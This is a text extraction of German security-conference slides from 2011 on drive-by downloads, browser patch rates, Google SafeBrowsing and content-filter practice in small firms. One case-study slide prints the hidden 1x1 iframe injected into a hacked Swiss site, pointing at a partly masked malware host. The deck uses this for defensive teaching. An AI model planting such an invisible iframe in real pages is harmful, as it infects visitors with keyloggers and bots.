Kampf gegen bösartige Websites (10:50 Uhr, Track 1)€¦ · Benutzung (für Google Suchanfragen)...

Business Communication

www.2wbc.ch - Unternehmensberatung für Informatik und Organisation

Kampf gegen bösartige Websites (10:50 Uhr, Track 1)

Wie schützt man sich vor infizierten Websites?

Dr. Thomas Dübendorfer, Google Switzerland GmbH

Thomas Weihrich, 2w Business Communications

Alex Bachmann, Studerus AG

1

Kampf gegen bösartige Websites

Dr. Thomas Dübendorfer Software Engineer und Tech Lead Google Switzerland GmbH

TEFO 2011, 24.11.2011, Zürich

Referent

Dr. Thomas Dübendorfer

• Präsident, Information Security Society Switzerland (www.ISSS.ch)

• Staff Software Engineer and Tech Lead, Google Switzerland GmbH

• Dozent, ETH Zürich

Ausbildung

Dr. sc., Dipl. Informatik-Ing., ETH Zürich

(ISC)2 Certified Information Systems Security Professional CISSP

Kontakt

Email: [email protected]

Web: http://thomas.duebendorfer.ch/

http://www.isss.ch/

mailto:[email protected]

http://thomas.duebendorfer.ch/

http://thomas.duebendorfer.ch/

3

Drive-By Downloads

Quiz

Was haben diese Websites gemeinsam?

• Department of Homeland Security

• United Nations

• UK Civil Service

• Funjet Vacations

• Howaboutlunch.ch (Blind date service)

• Swiss TrendNet Support Knowledge Base

Sie wurden alle im April 2008 gehackt

... wie 510’000

andere Webseiten

(.ASP SQL injection)

Weiterführende Informationen: http://www.f-secure.com/weblog/archives/00001427.html

Anteil bösartiger URLs nach Inhaltskategorie

6

Referenz: Niels Provos et al., Google 2008, http://research.google.com/archive/provos-2008a.pdf

Fallstudie: Bösartige Website in der Schweiz

Diese Website wurde gehackt, um Malware-Downloads einzubinden.

Der Webmaster wurde informiert.

<iframe src=

"http://try-cxxxxxx/strong/023/"

width=1 height=1

style="visibility: hidden">

</iframe>

Installierte Malware:

• Keylogger

• Generische Downloader

• Bots

• Malware Überwachungs-

agenten

• Dialer

8

Wie sicher ist weit verbreitete Software?

Sicherheitsschwachstellen in Top Software

Produkt 2009 2010 Trend

Adobe Flash 23 56 +143%

Adobe PDF Reader 56 116 +107%

Microsoft

Internet Explorer

36 51 +42%

Microsoft

Windows Vista

59 90 +53%

Microsoft

Windows 7

5

(seit 22. Okt. 2009)

75 k.A.

Auswirkungen bei Ausnützen der Schwachstellen:

• Internet Explorer: Systemzugriff, Zugriff auf sensitive Daten etc.

• Windows 7: Systemzugriff, erhöhte Zugriffsrechte,

Dienstverweigerung (Denial of Service), Datenmanipulation etc.

Ca. 75 Sicherheitsupdates von 22 Herstellern pro Jahr und Heim-PC!

Abhilfe: Secunia PSI http://secunia.com/PSI scannt PC nach

verfügbaren Updates. Gratis für Heimbenutzer.

http://secunia.com/PSI

Apple Safari 5.0.5 Sicherheitsupdate

Sicherheitspatch für Schwachstelle in Webbrowser Apple Safari

verfügbar am 14.4.2011.

Schwachstelle betrifft:

• Apple Safari 5 (Windows)

• Apple Safari 5 (Mac OS X 10.5 und 10.6).

Auswirkung der Schwachstelle:

Der Besuch einer in böswilliger Absicht erstellten Website kann zu

einem unerwarteten Programmabbruch oder zur willkürlichen

Codeausführung führen.

Referenz:

Apple Support „Informationen über den Sicherheitsinhalt von Safari 5.0.5 “ vom 14.4.2011,

http://support.apple.com/kb/HT4596?viewlocale=de_DE

http://support.apple.com/kb/HT4596?viewlocale=de_DE

2011: Apple Safari 5.0.5 Update installiert?

45%

51%

4%

5.0.5

5.x (älterals 5.0.5)

4.x undälter

Anteile der Apple Safari Webbrowser-Versionen unter Windows 7 in

Benutzung (für Google Suchanfragen) drei Wochen nach Verfügbarkeit

des kritischen Security-Updates 5.0.5.

Quellen: [2011] Google, 2011, [2008] „Understanding the Web Browser Threat“, Frei S., Dübendorfer T., DEFCON 2008

45% veraltete

Webbrowser im

Einsatz global

(im Jahr 2008)

97%

85%

53%

33% 24%

Anteil der aktualisierten Webbrowser (innerhalb gleicher Hauptversion), welche

Google’s Webserver besuchten über 21 Tage nach verfügbarem Sicherheitsupdate.

Browser Update: Effektivitätsmessungen

Referenz: „Web Browser Security Update Effectiveness“, Dübendorfer T., Frei S., CRITIS 2009

13

Google SafeBrowsing Dank an Niels Provos und Noé Lutz von Google, Inc. für Ihren Input.

Schutz des Benutzers vor bösartigen Websites

Google SafeBrowsing schützt vor bösartigen Websites (Phishing,

Drive-By Download).

Warnhinweis bei Google Suchresultaten, die auf bösartige Websites

zeigen. Betroffener Webmaster wird informiert, der ISP (Autonomous

System) kann die SafeBrowsing-Liste für sein Netzwerk anfordern.

Warnung vor bösartigen Websites seit Firefox 3

Google Chrome, Apple Safari und Mozilla Firefox benutzen

das Google SafeBrowsing API zur Überprüfung auf bösartige URLs

zum Schutz des Websurfers.

Sicherheitshinweise für Webmaster und Surfer

Gratis Google Webmaster-Tools bieten dem Webmaster Sicherheitsdetails

bei entdeckter Malware oder unsicherer Software:

http://www.google.com/webmasters/

http://www.google.com/webmasters/

Oktober 2010:

Nach Ort der IP-Adressen von entdeckten Phishing-Websites.

Legende: ■ < ■ < ■ < ■ (log scale) Referenz: Okt. 2010, Google, SafeBrowsing

Top Countries Hosting Phishing Websites

November 2011:

Nach Ort der IP-Adressen von entdeckten Phishing-Websites.

Legende: ■ < ■ < ■ < ■ (log scale) Referenz: Nov. 2011, Google, SafeBrowsing

Top Countries Hosting Phishing Websites

242 (April 2011)

Referenz: 26.4.2010, Google, SafeBrowsing project

Phishing Hosting nach Top Level Domain

ch: 902 (Okt. 2011)

Referenz: 26.4.2010, Google, SafeBrowsing project

434 (April 2010)

Malware Hosting nach Top Level Domain

ch 188 (Okt. 2011)

Weitere gratis Sicherheitstechniken von Google

• Google Chrome: Web Browser, der Hackern von Pwn2Own 2010

am längsten standhielt Auto-Updates alle sechs Stunden Führt Adobe Flash Updates wesentlich schneller aus als

Standardupdateroutine

• SecBrowsing: schaltet unsichere Plug-ins in Chrome automatisch ab auch für Microsoft Internet Explorer und Mozilla Firefox:

http://secbrowsing.appspot.com/

• Google Public DNS Server: IPv4: 8.8.8.8, 8.8.4.4; gibt es auch für IPv6

Details: http://code.google.com/intl/de/speed/public-dns/docs/using.html

21

http://secbrowsing.appspot.com/

http://code.google.com/intl/de/speed/public-dns/docs/using.html



22

Danke für Ihre Aufmerksamkeit

Referent: Dr. Thomas Dübendorfer

23

Referenzen

• Google Webmaster Tools

https://www.google.com/webmasters/tools/

• XML feed for AS owners with malware and phishing URLs detected by

Google SafeBrowsing

http://googleonlinesecurity.blogspot.com/2010/10/phishing-urls-and-xml-

notifications.html

• Dübendorfer Thomas, Frei Stefan.

Why Silent Updates Boost Security, May 2009

http://www.techzoom.net/papers/browser_silent_updates_2009.pdf

• Niels Provos, Panayiotis Mavrommatis, Moheed Abu Rajab, and Fabian

Monrose. All Your iFRAMEs Point to Us. Google Technical Report. Feb 2008.

http://research.google.com/archive/provos-2008a.pdf

• Niels Provos, Dean McNamee, Panayiotis Mavrommatis, Ke Wang, and

Nagendra Modadugu. The Ghost in the Browser: Analysis of Web-based

Malware. In Proceedings of the first USENIX workshop on hot topics in

Botnets (HotBots '07), April 2007.

http://www.usenix.org/event/hotbots07/tech/full_papers/provos/provos.pdf

https://www.google.com/webmasters/tools/

http://googleonlinesecurity.blogspot.com/2010/10/phishing-urls-and-xml-notifications.html









http://www.techzoom.net/papers/browser_silent_updates_2009.pdf




http://www.usenix.org/event/hotbots07/tech/full_papers/provos/provos.pdf



Front

Praxis im KMU Betrieb

Thomas Weihrich

Kampf gegen bösartige Websites



Die Firma 2wbc GmbH bietet Ihnen ein komplettes Leistungsangebot, das Ihre Informatik-Bedürfnisse vollständig abdeckt. Unser Schwerpunkt liegt dabei auf der praxisbezogenen Beratung und der kundenorientierten Projektleitung.

Gegründet 2003, 12 Mitarbeiter, eigentümergeführt

Kunden im Raum Ostschweiz, Schweiz, Österreich, Deutschland und Westafrika

Thomas Weihrich

Grundausbildung Maschinenbau,

Informatiktechniker TS, Nachdiplom NDS HTL/ITR

10 Jahre Software Engineering + 15 Jahre IT Systembau / Gesamtlösungen



INHALT

• Was wir beim KMU antreffen

• Empfehlungen zur IT Infrastruktur beim KMU

• Verbesserungen am Internetzugang

• Erfahrungen mit Content Filtern

• Zusammenfassung



Erste Eindrücke beim KMU

• Der Mitarbeiter im KMU Betrieb ist fokussiert auf seine Aufgaben und kümmert sich nicht um seine EDV Arbeitsmittel

• Warnmeldungen werden erst dann wahrgenommen, wenn diese penetrant und störend sind oder der PC bereits nicht mehr richtig funktioniert

• Der PC im KMU ist ‘lokal’ administriert

• Benutzer verfügen über umfangreiche Rechte (Administrator)

• Der Internetzugang läuft über ein vom Provider gratis zur Verfügung gestelltes Modem/Router

• Kollege war behilflich beim Einrichten…



Weitere Eindrücke beim KMU

• Gratis Virenschutz ist gemäss Presse gleich gut, darum werden auch gleich zwei davon installiert…

• Updates machen den PC langsam – besser deaktivieren…• Mit mehreren installierten Browsern hat man immer den

richtigen gleich zur Hand…• Viele Gratis-Tools erhöhen die Produktivität und die Individualität• Programme, Tools und AddOns funktionieren im Originalzustand• Keine Richtlinien/ Policy zum Gebrauch des Internets • Wenig Basiswissen zum Internet



Empfehlungen zur IT Infrastruktur beim KMU

• Regelmässige Updates für – Server OS, – Client OS – Programme und AddOns

• Update Verwaltung und Steuerung durch– WSUS (Gratis von Microsoft)– System Center Essentials o.A.

• Virenschutzlösung – mit zentraler Verwaltungskonsole– auf Server und Client installiert



Empfehlungen zur IT Infrastruktur beim KMU

• Minimalinstallation– Kundenimage ab 3 PC über Bereitstellungsdienst– Verzicht auf unwichtige AddOns

• Nur notwendige lokale Rechte– Keine Administratorenberechtigung – Benutzerkontensteuerung aktiviert– Feinsteuerung über zentrale GPO

• Regelmässige Systemüberprüfungen– Kontrolle mit Checkliste– Überwachung mit automatischer Benachrichtigung



Problemlösung beim Internetzugang

• Einsatz einer All-In-One Firewall Lösung mit– Intrusion Detection and Prevention (IDP)– Antivirusfilter (AV)– Contentfilter (CF)– AntiSpam (AS)

• Schulung der Anwender– Aufklärung und Sensibilisierung

• Firmenrichtlinien– Regelung der Internetverwendung– Erlassen von Verhaltensrichtlinien



Firewall Einstellungen



Antivirus (AV)

• Schutz der LAN Zone vor Viren aus dem Internet



Antivirus (AV)

• Scan der verfügbaren Protokolle

• Scan von Anhängen



Nutzen vom Content Filter (CF)

• Schutz der IT Infrastruktur vor Malware

• Schutz des Anwenders vor unerwünschten Inhalten

• Kinder- und Jugendschutz

• Reduktion der Ablenkung und

Fokussierung auf das Wesentliche

• Bandbreitenoptimierung

• Information über das Surfverhalten



Content Filter (CF)



Erfahrungswerte Blocked



Erfahrungswerte Passed



Erfahrungswerte kurz nach Einführung CF



Erfahrungswerte nach Schulung



Erfahrungswerte CF



Zusammenfassung

• Patch Management für alle eingesetzten Komponenten• Zentralisierte Verwaltung und Überwachung der Systeme• Reduktion auf die notwendigen Anwendungen• Reduktion auf die notwendigen Rechte• Regelmässige Checks• All-in-One-Firewall richtig konfiguriert• Business Content Only• Aufklärung und Schulung• Richtlinien



Schutz vor „Drive-by“ Infektion – Content-Filter

mit gültiger Content-Filter-Lizenz



Anteil bösartiger URLs nach Inhaltskategorie

28

Referenz: Niels Provos et al., Google 2008, http://research.google.com/archive/provos-2008a.pdf



Wahl der Content-Filter-Kategorien

Kampf gegen bösartige Websites (10:50 Uhr, Track 1)€¦ · Benutzung (für Google Suchanfragen)...

Documents

Transcript of Kampf gegen bösartige Websites (10:50 Uhr, Track 1)€¦ · Benutzung (für Google Suchanfragen)...